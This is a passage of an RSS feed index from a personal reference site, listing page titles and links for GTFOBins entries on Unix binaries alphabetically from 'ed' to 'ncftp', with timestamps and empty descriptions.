+0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/eb/</guid><description/></item><item><title>ed</title><link>https://bokkapig.pages.dev/refs/gtfobins/ed/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/ed/</guid><description/></item><item><title>efax</title><link>https://bokkapig.pages.dev/refs/gtfobins/efax/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/efax/</guid><description/></item><item><title>egrep</title><link>https://bokkapig.pages.dev/refs/gtfobins/egrep/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/egrep/</guid><description/></item><item><title>elvish</title><link>https://bokkapig.pages.dev/refs/gtfobins/elvish/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/elvish/</guid><description/></item><item><title>emacs</title><link>https://bokkapig.pages.dev/refs/gtfobins/emacs/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/emacs/</guid><description/></item><item><title>enscript</title><link>https://bokkapig.pages.dev/refs/gtfobins/enscript/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/enscript/</guid><description/></item><item><title>env</title><link>https://bokkapig.pages.dev/refs/gtfobins/env/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/env/</guid><description/></item><item><title>eqn</title><link>https://bokkapig.pages.dev/refs/gtfobins/eqn/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/eqn/</guid><description/></item><item><title>espeak</title><link>https://bokkapig.pages.dev/refs/gtfobins/espeak/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/espeak/</guid><description/></item><item><title>ex</title><link>https://bokkapig.pages.dev/refs/gtfobins/ex/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/ex/</guid><description/></item><item><title>exiftool</title><link>https://bokkapig.pages.dev/refs/gtfobins/exiftool/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/exiftool/</guid><description/></item><item><title>expand</title><link>https://bokkapig.pages.dev/refs/gtfobins/expand/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/expand/</guid><description/></item><item><title>expect</title><link>https://bokkapig.pages.dev/refs/gtfobins/expect/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/expect/</guid><description/></item><item><title>facter</title><link>https://bokkapig.pages.dev/refs/gtfobins/facter/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/facter/</guid><description/></item><item><title>fail2ban-client</title><link>https://bokkapig.pages.dev/refs/gtfobins/fail2ban-client/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/fail2ban-client/</guid><description/></item><item><title>fastfetch</title><link>https://bokkapig.pages.dev/refs/gtfobins/fastfetch/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/fastfetch/</guid><description/></item><item><title>ffmpeg</title><link>https://bokkapig.pages.dev/refs/gtfobins/ffmpeg/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/ffmpeg/</guid><description/></item><item><title>fgrep</title><link>https://bokkapig.pages.dev/refs/gtfobins/fgrep/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/fgrep/</guid><description/></item><item><title>file</title><link>https://bokkapig.pages.dev/refs/gtfobins/file/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/file/</guid><description/></item><item><title>find</title><link>https://bokkapig.pages.dev/refs/gtfobins/find/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/find/</guid><description/></item><item><title>finger</title><link>https://bokkapig.pages.dev/refs/gtfobins/finger/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/finger/</guid><description/></item><item><title>firejail</title><link>https://bokkapig.pages.dev/refs/gtfobins/firejail/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/firejail/</guid><description/></item><item><title>fish</title><link>https://bokkapig.pages.dev/refs/gtfobins/fish/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/fish/</guid><description/></item><item><title>flock</title><link>https://bokkapig.pages.dev/refs/gtfobins/flock/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/flock/</guid><description/></item><item><title>fmt</title><link>https://bokkapig.pages.dev/refs/gtfobins/fmt/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/fmt/</guid><description/></item><item><title>fold</title><link>https://bokkapig.pages.dev/refs/gtfobins/fold/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/fold/</guid><description/></item><item><title>forge</title><link>https://bokkapig.pages.dev/refs/gtfobins/forge/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/forge/</guid><description/></item><item><title>fping</title><link>https://bokkapig.pages.dev/refs/gtfobins/fping/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/fping/</guid><description/></item><item><title>ftp</title><link>https://bokkapig.pages.dev/refs/gtfobins/ftp/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/ftp/</guid><description/></item><item><title>fzf</title><link>https://bokkapig.pages.dev/refs/gtfobins/fzf/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/fzf/</guid><description/></item><item><title>g++</title><link>https://bokkapig.pages.dev/refs/gtfobins/g/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/g/</guid><description/></item><item><title>gawk</title><link>https://bokkapig.pages.dev/refs/gtfobins/gawk/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/gawk/</guid><description/></item><item><title>gcc</title><link>https://bokkapig.pages.dev/refs/gtfobins/gcc/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/gcc/</guid><description/></item><item><title>gcloud</title><link>https://bokkapig.pages.dev/refs/gtfobins/gcloud/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/gcloud/</guid><description/></item><item><title>gcore</title><link>https://bokkapig.pages.dev/refs/gtfobins/gcore/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/gcore/</guid><description/></item><item><title>gdb</title><link>https://bokkapig.pages.dev/refs/gtfobins/gdb/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/gdb/</guid><description/></item><item><title>gem</title><link>https://bokkapig.pages.dev/refs/gtfobins/gem/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/gem/</guid><description/></item><item><title>genie</title><link>https://bokkapig.pages.dev/refs/gtfobins/genie/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/genie/</guid><description/></item><item><title>genisoimage</title><link>https://bokkapig.pages.dev/refs/gtfobins/genisoimage/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/genisoimage/</guid><description/></item><item><title>getent</title><link>https://bokkapig.pages.dev/refs/gtfobins/getent/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/getent/</guid><description/></item><item><title>ghc</title><link>https://bokkapig.pages.dev/refs/gtfobins/ghc/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/ghc/</guid><description/></item><item><title>ghci</title><link>https://bokkapig.pages.dev/refs/gtfobins/ghci/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/ghci/</guid><description/></item><item><title>gimp</title><link>https://bokkapig.pages.dev/refs/gtfobins/gimp/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/gimp/</guid><description/></item><item><title>ginsh</title><link>https://bokkapig.pages.dev/refs/gtfobins/ginsh/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/ginsh/</guid><description/></item><item><title>git</title><link>https://bokkapig.pages.dev/refs/gtfobins/git/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/git/</guid><description/></item><item><title>gnuplot</title><link>https://bokkapig.pages.dev/refs/gtfobins/gnuplot/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/gnuplot/</guid><description/></item><item><title>go</title><link>https://bokkapig.pages.dev/refs/gtfobins/go/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/go/</guid><description/></item><item><title>grc</title><link>https://bokkapig.pages.dev/refs/gtfobins/grc/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/grc/</guid><description/></item><item><title>grep</title><link>https://bokkapig.pages.dev/refs/gtfobins/grep/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/grep/</guid><description/></item><item><title>gtester</title><link>https://bokkapig.pages.dev/refs/gtfobins/gtester/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/gtester/</guid><description/></item><item><title>guile</title><link>https://bokkapig.pages.dev/refs/gtfobins/guile/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/guile/</guid><description/></item><item><title>gzip</title><link>https://bokkapig.pages.dev/refs/gtfobins/gzip/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/gzip/</guid><description/></item><item><title>hashcat</title><link>https://bokkapig.pages.dev/refs/gtfobins/hashcat/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/hashcat/</guid><description/></item><item><title>hd</title><link>https://bokkapig.pages.dev/refs/gtfobins/hd/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/hd/</guid><description/></item><item><title>head</title><link>https://bokkapig.pages.dev/refs/gtfobins/head/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/head/</guid><description/></item><item><title>hexdump</title><link>https://bokkapig.pages.dev/refs/gtfobins/hexdump/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/hexdump/</guid><description/></item><item><title>hg</title><link>https://bokkapig.pages.dev/refs/gtfobins/hg/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/hg/</guid><description/></item><item><title>highlight</title><link>https://bokkapig.pages.dev/refs/gtfobins/highlight/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/highlight/</guid><description/></item><item><title>hping3</title><link>https://bokkapig.pages.dev/refs/gtfobins/hping3/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/hping3/</guid><description/></item><item><title>iconv</title><link>https://bokkapig.pages.dev/refs/gtfobins/iconv/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/iconv/</guid><description/></item><item><title>iftop</title><link>https://bokkapig.pages.dev/refs/gtfobins/iftop/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/iftop/</guid><description/></item><item><title>install</title><link>https://bokkapig.pages.dev/refs/gtfobins/install/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/install/</guid><description/></item><item><title>ionice</title><link>https://bokkapig.pages.dev/refs/gtfobins/ionice/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/ionice/</guid><description/></item><item><title>ip</title><link>https://bokkapig.pages.dev/refs/gtfobins/ip/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/ip/</guid><description/></item><item><title>iptables-save</title><link>https://bokkapig.pages.dev/refs/gtfobins/iptables-save/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/iptables-save/</guid><description/></item><item><title>irb</title><link>https://bokkapig.pages.dev/refs/gtfobins/irb/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/irb/</guid><description/></item><item><title>ispell</title><link>https://bokkapig.pages.dev/refs/gtfobins/ispell/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/ispell/</guid><description/></item><item><title>java</title><link>https://bokkapig.pages.dev/refs/gtfobins/java/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/java/</guid><description/></item><item><title>jjs</title><link>https://bokkapig.pages.dev/refs/gtfobins/jjs/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/jjs/</guid><description/></item><item><title>joe</title><link>https://bokkapig.pages.dev/refs/gtfobins/joe/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/joe/</guid><description/></item><item><title>join</title><link>https://bokkapig.pages.dev/refs/gtfobins/join/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/join/</guid><description/></item><item><title>journalctl</title><link>https://bokkapig.pages.dev/refs/gtfobins/journalctl/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/journalctl/</guid><description/></item><item><title>jq</title><link>https://bokkapig.pages.dev/refs/gtfobins/jq/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/jq/</guid><description/></item><item><title>jrunscript</title><link>https://bokkapig.pages.dev/refs/gtfobins/jrunscript/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/jrunscript/</guid><description/></item><item><title>jshell</title><link>https://bokkapig.pages.dev/refs/gtfobins/jshell/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/jshell/</guid><description/></item><item><title>jtag</title><link>https://bokkapig.pages.dev/refs/gtfobins/jtag/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/jtag/</guid><description/></item><item><title>julia</title><link>https://bokkapig.pages.dev/refs/gtfobins/julia/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/julia/</guid><description/></item><item><title>knife</title><link>https://bokkapig.pages.dev/refs/gtfobins/knife/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/knife/</guid><description/></item><item><title>ksh</title><link>https://bokkapig.pages.dev/refs/gtfobins/ksh/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/ksh/</guid><description/></item><item><title>ksshell</title><link>https://bokkapig.pages.dev/refs/gtfobins/ksshell/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/ksshell/</guid><description/></item><item><title>ksu</title><link>https://bokkapig.pages.dev/refs/gtfobins/ksu/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/ksu/</guid><description/></item><item><title>kubectl</title><link>https://bokkapig.pages.dev/refs/gtfobins/kubectl/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/kubectl/</guid><description/></item><item><title>last</title><link>https://bokkapig.pages.dev/refs/gtfobins/last/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/last/</guid><description/></item><item><title>lastb</title><link>https://bokkapig.pages.dev/refs/gtfobins/lastb/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/lastb/</guid><description/></item><item><title>latex</title><link>https://bokkapig.pages.dev/refs/gtfobins/latex/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/latex/</guid><description/></item><item><title>latexmk</title><link>https://bokkapig.pages.dev/refs/gtfobins/latexmk/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/latexmk/</guid><description/></item><item><title>ld.so</title><link>https://bokkapig.pages.dev/refs/gtfobins/ld-so/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/ld-so/</guid><description/></item><item><title>ldconfig</title><link>https://bokkapig.pages.dev/refs/gtfobins/ldconfig/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/ldconfig/</guid><description/></item><item><title>less</title><link>https://bokkapig.pages.dev/refs/gtfobins/less/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/less/</guid><description/></item><item><title>lftp</title><link>https://bokkapig.pages.dev/refs/gtfobins/lftp/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/lftp/</guid><description/></item><item><title>links</title><link>https://bokkapig.pages.dev/refs/gtfobins/links/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/links/</guid><description/></item><item><title>ln</title><link>https://bokkapig.pages.dev/refs/gtfobins/ln/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/ln/</guid><description/></item><item><title>loginctl</title><link>https://bokkapig.pages.dev/refs/gtfobins/loginctl/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/loginctl/</guid><description/></item><item><title>logrotate</title><link>https://bokkapig.pages.dev/refs/gtfobins/logrotate/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/logrotate/</guid><description/></item><item><title>logsave</title><link>https://bokkapig.pages.dev/refs/gtfobins/logsave/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/logsave/</guid><description/></item><item><title>look</title><link>https://bokkapig.pages.dev/refs/gtfobins/look/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/look/</guid><description/></item><item><title>lp</title><link>https://bokkapig.pages.dev/refs/gtfobins/lp/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/lp/</guid><description/></item><item><title>ltrace</title><link>https://bokkapig.pages.dev/refs/gtfobins/ltrace/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/ltrace/</guid><description/></item><item><title>lua</title><link>https://bokkapig.pages.dev/refs/gtfobins/lua/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/lua/</guid><description/></item><item><title>lualatex</title><link>https://bokkapig.pages.dev/refs/gtfobins/lualatex/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/lualatex/</guid><description/></item><item><title>luatex</title><link>https://bokkapig.pages.dev/refs/gtfobins/luatex/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/luatex/</guid><description/></item><item><title>lwp-download</title><link>https://bokkapig.pages.dev/refs/gtfobins/lwp-download/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/lwp-download/</guid><description/></item><item><title>lwp-request</title><link>https://bokkapig.pages.dev/refs/gtfobins/lwp-request/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/lwp-request/</guid><description/></item><item><title>lxd</title><link>https://bokkapig.pages.dev/refs/gtfobins/lxd/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/lxd/</guid><description/></item><item><title>m4</title><link>https://bokkapig.pages.dev/refs/gtfobins/m4/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/m4/</guid><description/></item><item><title>mail</title><link>https://bokkapig.pages.dev/refs/gtfobins/mail/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/mail/</guid><description/></item><item><title>make</title><link>https://bokkapig.pages.dev/refs/gtfobins/make/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/make/</guid><description/></item><item><title>man</title><link>https://bokkapig.pages.dev/refs/gtfobins/man/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/man/</guid><description/></item><item><title>mawk</title><link>https://bokkapig.pages.dev/refs/gtfobins/mawk/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/mawk/</guid><description/></item><item><title>minicom</title><link>https://bokkapig.pages.dev/refs/gtfobins/minicom/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/minicom/</guid><description/></item><item><title>more</title><link>https://bokkapig.pages.dev/refs/gtfobins/more/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/more/</guid><description/></item><item><title>mosh-server</title><link>https://bokkapig.pages.dev/refs/gtfobins/mosh-server/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/mosh-server/</guid><description/></item><item><title>mosquitto</title><link>https://bokkapig.pages.dev/refs/gtfobins/mosquitto/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/mosquitto/</guid><description/></item><item><title>mount</title><link>https://bokkapig.pages.dev/refs/gtfobins/mount/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/mount/</guid><description/></item><item><title>msfconsole</title><link>https://bokkapig.pages.dev/refs/gtfobins/msfconsole/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/msfconsole/</guid><description/></item><item><title>msgattrib</title><link>https://bokkapig.pages.dev/refs/gtfobins/msgattrib/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/msgattrib/</guid><description/></item><item><title>msgcat</title><link>https://bokkapig.pages.dev/refs/gtfobins/msgcat/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/msgcat/</guid><description/></item><item><title>msgconv</title><link>https://bokkapig.pages.dev/refs/gtfobins/msgconv/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/msgconv/</guid><description/></item><item><title>msgfilter</title><link>https://bokkapig.pages.dev/refs/gtfobins/msgfilter/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/msgfilter/</guid><description/></item><item><title>msgmerge</title><link>https://bokkapig.pages.dev/refs/gtfobins/msgmerge/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/msgmerge/</guid><description/></item><item><title>msguniq</title><link>https://bokkapig.pages.dev/refs/gtfobins/msguniq/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/msguniq/</guid><description/></item><item><title>mtr</title><link>https://bokkapig.pages.dev/refs/gtfobins/mtr/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/mtr/</guid><description/></item><item><title>multitime</title><link>https://bokkapig.pages.dev/refs/gtfobins/multitime/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/multitime/</guid><description/></item><item><title>mutt</title><link>https://bokkapig.pages.dev/refs/gtfobins/mutt/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/mutt/</guid><description/></item><item><title>mv</title><link>https://bokkapig.pages.dev/refs/gtfobins/mv/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/mv/</guid><description/></item><item><title>mypy</title><link>https://bokkapig.pages.dev/refs/gtfobins/mypy/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/mypy/</guid><description/></item><item><title>mysql</title><link>https://bokkapig.pages.dev/refs/gtfobins/mysql/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/mysql/</guid><description/></item><item><title>nano</title><link>https://bokkapig.pages.dev/refs/gtfobins/nano/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/nano/</guid><description/></item><item><title>nasm</title><link>https://bokkapig.pages.dev/refs/gtfobins/nasm/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/nasm/</guid><description/></item><item><title>nawk</title><link>https://bokkapig.pages.dev/refs/gtfobins/nawk/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/nawk/</guid><description/></item><item><title>nc</title><link>https://bokkapig.pages.dev/refs/gtfobins/nc/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/nc/</guid><description/></item><item><title>ncdu</title><link>https://bokkapig.pages.dev/refs/gtfobins/ncdu/</link><pubDate>Wed, 27 May 2026 14:01:45 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/gtfobins/ncdu/</guid><description/></item><item><title>ncftp</title><link>https://bokkapig.pages.dev/refs/gtfobins/ncftp/</link><pubDate>Wed, 27 May 2026 14:01:45 